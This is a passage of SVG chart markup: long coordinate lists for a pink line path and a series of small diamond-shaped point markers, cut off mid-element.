31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 252.16984510476246 L 120.4744503862151 252.16984510476246 L 122.45008912655972 252.16984510476246 L 124.42572786690435 252.16984510476246 L 126.40136660724897 252.16984510476246 L 128.3770053475936 252.16984510476246 L 130.35264408793822 252.16984510476246 L 132.32828282828285 252.16984510476246 L 134.3039215686275 252.16984510476246 L 136.2795603089721 252.16984510476246 L 138.25519904931673 252.16984510476246 L 140.23083778966134 252.16984510476246 L 142.20647653000597 252.16984510476246 L 144.18211527035058 252.16984510476246 L 146.15775401069521 252.16984510476246 L 148.13339275103985 252.16984510476246 L 150.10903149138446 252.16984510476246 L 152.0846702317291 252.16984510476246 L 154.0603089720737 252.16984510476246 L 156.03594771241833 252.16984510476246 L 158.01158645276294 252.16984510476246 L 159.98722519310758 252.16984510476246 L 161.96286393345218 252.16984510476246 L 163.93850267379682 252.16984510476246 L 165.91414141414145 252.16984510476246 L 167.88978015448606 252.16984510476246 L 169.8654188948307 252.16984510476246 L 171.8410576351753 252.16984510476246 L 173.81669637551994 252.16984510476246 L 175.79233511586455 252.16984510476246 L 177.76797385620918 252.16984510476246 L 179.74361259655382 252.16984510476246 L 181.71925133689842 252.16984510476246 L 183.69489007724306 252.16984510476246 L 185.67052881758767 252.16984510476246 L 187.6461675579323 252.16984510476246 L 189.6218062982769 252.16984510476246 L 191.59744503862154 252.16984510476246 L 193.57308377896615 252.16984510476246 L 195.5487225193108 252.16984510476246 L 197.52436125965542 252.16984510476246 L 199.50000000000003 252.16984510476246 L 201.47563874034466 252.16984510476246 L 203.45127748068927 252.16984510476246 L 205.4269162210339 252.16984510476246 L 207.4025549613785 252.16984510476246 L 209.37819370172315 252.16984510476246 L 211.35383244206778 252.16984510476246 L 213.3294711824124 252.16984510476246 L 215.30510992275703 252.16984510476246 L 217.28074866310163 238.12117767619102 L 219.25638740344627 227.70874339047674 L 221.23202614379088 214.29309310476248 L 223.2076648841355 207.177929676191 L 225.18330362448012 207.177929676191 L 227.15894236482475 207.177929676191 L 229.1345811051694 207.177929676191 L 231.110219845514 207.177929676191 L 233.08585858585863 207.177929676191 L 235.06149732620324 207.177929676191 L 237.03713606654787 207.177929676191 L 239.01277480689248 207.177929676191 L 240.98841354723712 207.177929676191 L 242.96405228758175 207.177929676191 L 244.93969102792636 207.177929676191 L 246.915329768271 207.177929676191 L 248.8909685086156 207.02913244952424 L 250.86660724896024 207.02913244952424 L 252.84224598930484 207.02913244952424 L 254.81788472964945 207.02913244952424 L 256.79352346999406 207.02913244952424 L 258.7691622103387 207.02913244952424 L 260.7448009506833 204.71985884952426 L 262.72043969102793 203.61855617523855 L 264.69607843137254 202.57059100952426 L 266.6717171717172 201.221426956191 L 268.6473559120618 201.221426956191 L 270.6229946524064 201.221426956191 L 272.598633392751 201.221426956191 L 274.5742721330957 201.221426956191 L 276.5499108734403 201.221426956191 L 278.5255496137849 201.221426956191 L 280.50118835412957 201.221426956191 L 282.4768270944742 201.221426956191 L 284.4524658348188 201.221426956191 L 286.4281045751634 201.221426956191 L 288.40374331550805 201.221426956191 L 290.37938205585266 201.221426956191 L 292.35502079619727 201.221426956191 L 294.33065953654193 201.221426956191 L 296.30629827688654 201.221426956191 L 298.28193701723114 201.221426956191 L 300.25757575757575 201.221426956191 L 302.2332144979204 201.221426956191 L 304.208853238265 201.221426956191 L 306.1844919786096 201.221426956191 L 308.1601307189543 201.221426956191 L 310.1357694592989 201.221426956191 L 312.1114081996435 201.221426956191 L 314.0870469399881 201.221426956191 L 316.0626856803328 201.221426956191 L 318.0383244206774 201.221426956191 L 320.013963161022 201.221426956191 L 321.98960190136665 201.221426956191 L 323.96524064171126 201.221426956191 L 325.94087938205587 201.221426956191 L 327.9165181224005 201.221426956191 L 329.89215686274514 201.221426956191 L 331.86779560308975 201.221426956191 L 333.84343434343435 201.221426956191 L 335.81907308377896 201.221426956191 L 337.7947118241236 201.221426956191 L 339.77035056446823 201.221426956191 L 341.74598930481284 201.221426956191 L 343.7216280451575 201.221426956191 L 345.6972667855021 201.221426956191 L 347.6729055258467 201.221426956191 L 349.6485442661913 201.221426956191 L 351.624183006536 201.221426956191 L 353.5998217468806 201.221426956191 L 355.5754604872252 201.221426956191 L 357.55109922756986 201.21215623619105 L 359.52673796791447 201.21215623619105 L 361.5023767082591 201.21215623619105 L 363.4780154486037 201.21215623619105 L 365.45365418894835 201.21215623619105 L 367.42929292929296 201.21215623619105 L 369.40493166963756 201.21215623619105 L 371.3805704099822 201.21215623619105 L 373.35620915032683 201.21215623619105 L 375.33184789067144 201.21215623619105 L 377.30748663101605 201.21215623619105 L 379.2831253713607 201.21215623619105 L 381.2587641117053 201.21215623619105 L 383.2344028520499 201.21215623619105 L 385.2100415923946 201.21215623619105 L 387.1856803327392 201.21215623619105 L 389.1613190730838 201.21215623619105 L 391.1369578134284 201.21215623619105 L 393.1125965537731 201.17433589333388 L 395.0882352941177 201.17433589333388" fill="none" stroke="#eeaaee" stroke-width="2"></path><path d="M 395 197 L 399 201 395 205 391 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 393 197 L 397 201 393 205 389 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 391 197 L 395 201 391 205 387 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 389 197 L 393 201 389 205 385 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 387 197 L 391 201 387 205 383 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 385 197 L 389 201 385 205 381 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 383 197 L 387 201 383 205 379 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 381.5 197 L 385.5 201 381.5 205 377.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 379.5 197 L 383.5 201 379.5 205 375.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 377.5 197 L 381.5 201 377.5 205 373.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 375.5 197 L 379.5 201 375.5 205 371.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 373.5 197 L 377.5 201 373.5 205 369.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 371.5 197 L 375.5 201 371.5 205 367.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 369.5 197 L 373.5 201 369.5 205 365.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 367.5 197 L 371.5 201 367.5 205 363.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 365.5 197 L 369.5 201 365.5 205 361.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 363.5 197 L 367.5 201 363.5 205 359.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 361.5 197 L 365.5 201 361.5 205 357.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 359.5 197 L 363.5 201 359.5 205 355.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 357.5 197 L 361.5 201 357.5 205 353.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 355.5 197 L 359.5 201 355.5 205 351.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 353.5 197 L 357.5 201 353.5 205 349.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 351.5 197 L 355.5 201 351.5 205 347.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 349.5 197 L 353.5 201 349.5 205 345.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 347.5 197 L 351.5 201 347.5 205 343.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 345.5 197 L 349.5 201 345.5 205 341.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 343.5 197 L 347.5 201 343.5 205 339.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 341.5 197 L 345.5 201 341.5 205 337.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 340 197 L 344 201 340 205 336 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 338 197 L 342 201 338 205 334 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 336 197 L 340 201 336 205 332 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 334 197 L 338 201 334 205 330 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 332 197 L 336 201 332 205 328 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 330 197 L 334 201 330 205 326 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 328 197 L 332 201 328 205 324 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 326 197 L 330 201 326 205 322 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 324 197 L 328 201 324 205 320 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 322 197 L 326 201 322 205 318 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 320 197 L 324 201 320 205 316 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 318 197 L 322 201 318 205 314 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 316 197 L 320 201 316 205 312 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 314 197 L 318 201 314 205 310 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 312 197 L 316 201 312 205 308 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 310 197 L 314 201 310 205 306 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 308 197 L 312 201 308 205 304 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 306 197 L 310 201 306 205 302 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 304 197 L 308 201 304 205 300 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 302 197 L 306 201 302 205 298 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 300.5 197 L 304.5 201 300.5 205 296.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 298.5 197 L 302.5 201 298.5 205 294.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 296.5 197 L 300.5 201 296.5 205 292.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 294.5 197 L 298.5 201 294.5 205 290.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 292.5 197 L 296.5 201 292.5 205 288.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 290.5 197 L 294.5 201 290.5 205 286.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 288.5 197 L 292.5 201 288.5 205 284.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 286.5 197 L 290.5 201 286.5 205 282.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 284.5 197 L 288.5 201 284.5 205 280.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 282.5 197 L 286.5 201 282.5 205 278.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 280.5 197 L 284.5 201 280.5 205 276.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 278.5 197 L 282.5 201 278.5 205 274.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 276.5 197 L 280.5 201 276.5 205 272.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 274.5 197 L 278.5 201 274.5 205 270.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 272.5 197 L 276.5 201 272.5 205 268.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 270.5 197 L 274.5 201 270.5 205 266.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 268.5 197 L 272.5 201 268.5 205 264.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 266.5 197 L 270.5 201 266.5 205 262.5 201 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 264.5 198.5 L 268.5 202.5 264.5 206.5 260.5 202.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 262.5 199.5 L 266.5 203.5 262.5 207.5 258.5 203.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 260.5 200.5 L 264.5 204.5 260.5 208.5 256.5 204.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 259 203 L 263 207 259 211 255 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 257 203 L 261 207 257 211 253 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 255 203 L 259 207 255 211 251 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 253 203 L 257 207 253 211 249 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 251 203 L 255 207 251 211 247 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 249 203 L 253 207 249 211 245 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 247 203 L 251 207 247 211 243 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 245 203 L 249 207 245 211 241 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 243 203 L 247 207 243 211 239 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 241 203 L 245 207 241 211 237 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 239 203 L 243 207 239 211 235 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 237 203 L 241 207 237 211 233 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 235 203 L 239 207 235 211 231 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 233 203 L 237 207 233 211 229 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 231 203 L 235 207 231 211 227 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 229 203 L 233 207 229 211 225 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 227 203 L 231 207 227 211 223 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 225 203 L 229 207 225 211 221 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 223 203 L 227 207 223 211 219 207 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 221 210.5 L 225 214.5 221 218.5 217 214.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 219.5 223.5 L 223.5 227.5 219.5 231.5 215.5 227.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 217.5 234 L 221.5 238 217.5 242 213.5 238 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 215.5 248 L 219.5 252 215.5 256 211.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 213.5 248 L 217.5 252 213.5 256 209.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 211.5 248 L 215.5 252 211.5 256 207.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 209.5 248 L 213.5 252 209.5 256 205.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 207.5 248 L 211.5 252 207.5 256 203.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 205.5 248 L 209.5 252 205.5 256 201.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 203.5 248 L 207.5 252 203.5 256 199.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 201.5 248 L 205.5 252 201.5 256 197.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 199.5 248 L 203.5 252 199.5 256 195.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 197.5 248 L 201.5 252 197.5 256 193.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 195.5 248 L 199.5 252 195.5 256 191.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 193.5 248 L 197.5 252 193.5 256 189.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 191.5 248 L 195.5 252 191.5 256 187.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 189.5 248 L 193.5 252 189.5 256 185.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 187.5 248 L 191.5 252 187.5 256 183.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 185.5 248 L 189.5 252 185.5 256 181.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 183.5 248 L 187.5 252 183.5 256 179.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 181.5 248 L 185.5 252 181.5 256 177.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 179.5 248 L 183.5 252 179.5 256 175.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 178 248 L 182 252 178 256 174 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 176 248 L 180 252 176 256 172 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 174 248 L 178 252 174 256 170 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 172 248 L 176 252 172 256 168 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 170 248 L 174 252 170 256 166 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 168 248 L 172 252 168 256 164 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 166 248 L 170 252 166 256 162 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 164 248 L 168 252 164 256 160 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 162 248 L 166 252 162 256 158 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 160 248 L 164 252 160 256 156 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 158 248 L 162 252 158 256 154 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 156 248 L 160 252 156 256 152 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 154 248 L 158 252 154 256 150 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 152 248 L 156 252 152 256 148 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 150 248 L 154 252 150 256 146 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 148 248 L 152 252 148 256 144 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 146 248 L 150 252 146 256 142 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 144 248 L 148 252 144 256 140 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 142 248 L 146 252 142 256 138 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 140 248 L 144 252 140 256 136 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 138.5 248 L 142.5 252 138.5 256 134.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 136.5 248 L 140.5 252 136.5 256 132.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 134.5 248 L 138.5 252 134.5 256 130.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 132.5 248 L 136.5 252 132.5 256 128.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 130.5 248 L 134.5 252 130.5 256 126.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 128.5 248 L 132.5 252 128.5 256 124.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 126.5 248 L 130.5 252 126.5 256 122.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 124.5 248 L 128.5 252 124.5 256 120.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 122.5 248 L 126.5 252 122.5 256 118.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 120.5 248 L 124.5 252 120.5 256 116.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 118.5 248 L 122.5 252 118.5 256 114.5 252 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 116.5 249.5 L 120.5 253.5 116.5 257.5 112.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 114.5 249.5 L 118.5 253.5 114.5 257.5 110.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 112.5 249.5 L 116.5 253.5 112.5 257.5 108.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 110.5 249.5 L 114.5 253.5 110.5 257.5 106.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 108.5 249.5 L 112.5 253.5 108.5 257.5 104.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 106.5 249.5 L 110.5 253.5 106.5 257.5 102.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 104.5 249.5 L 108.5 253.5 104.5 257.5 100.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 102.5 249.5 L 106.5 253.5 102.5 257.5 98.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 100.5 249.5 L 104.5 253.5 100.5 257.5 96.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 98.5 249.5 L 102.5 253.5 98.5 257.5 94.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 97 249.5 L 101 253.5 97 257.5 93 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 95 249.5 L 99 253.5 95 257.5 91 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 93 249.5 L 97 253.5 93 257.5 89 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 91 249.5 L 95 253.5 91 257.5 87 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 89 249.5 L 93 253.5 89 257.5 85 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 87 249.5 L 91 253.5 87 257.5 83 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 85 249.5 L 89 253.5 85 257.5 81 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 83 249.5 L 87 253.5 83 257.5 79 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 81 249.5 L 85 253.5 81 257.5 77 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 79 249.5 L 83 253.5 79 257.5 75 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 77 249.5 L 81 253.5 77 257.5 73 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 75 249.5 L 79 253.5 75 257.5 71 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 73 249.5 L 77 253.5 73 257.5 69 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 71 249.5 L 75 253.5 71 257.5 67 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 69 249.5 L 73 253.5 69 257.5 65 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 67 249.5 L 71 253.5 67 257.5 63 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 65 249.5 L 69 253.5 65 257.5 61 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 63 249.5 L 67 253.5 63 257.5 59 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 61 249.5 L 65 253.5 61 257.5 57 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 59 249.5 L 63 253.5 59 257.5 55 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 57.5 249.5 L 61.5 253.5 57.5 257.5 53.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 55.5 249.5 L 59.5 253.5 55.5 257.5 51.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 53.5 249.5 L 57.5 253.5 53.5 257.5 49.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 51.5 249.5 L 55.5 253.5 51.5 257.5 47.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 49.5 249.5 L 53.5 253.5 49.5 257.5 45.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 47.5 249.5 L 51.5 253.5 47.5 257.5 43.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 45.5 249.5 L 49.5 253.5 45.5 257.5 41.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 43.5 249.5 L 47.5 253.5 43.5 257.5 39.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 41.5 249.5 L 45.5 253.5 41.5 257.5 37.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 39.5 249.5 L 43.5 253.5 39.5 257.5 35.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 37.5 249.5 L 41.5 253.5 37.5 257.5 33.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 35.5 249.5 L 39.5 253.5 35.5 257.5 31.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 33.5 249.5 L 37.5 253.5 33.5 257.5 29.5 253.5 Z" fill="#eeaaee" stroke="#333" stroke-width="0.000001"></path><path d="M 31.5 249.5 L 35.5 253.5 31.5 257.5 27.5 253.5 Z" fill="#eeaaee" stroke="#333" 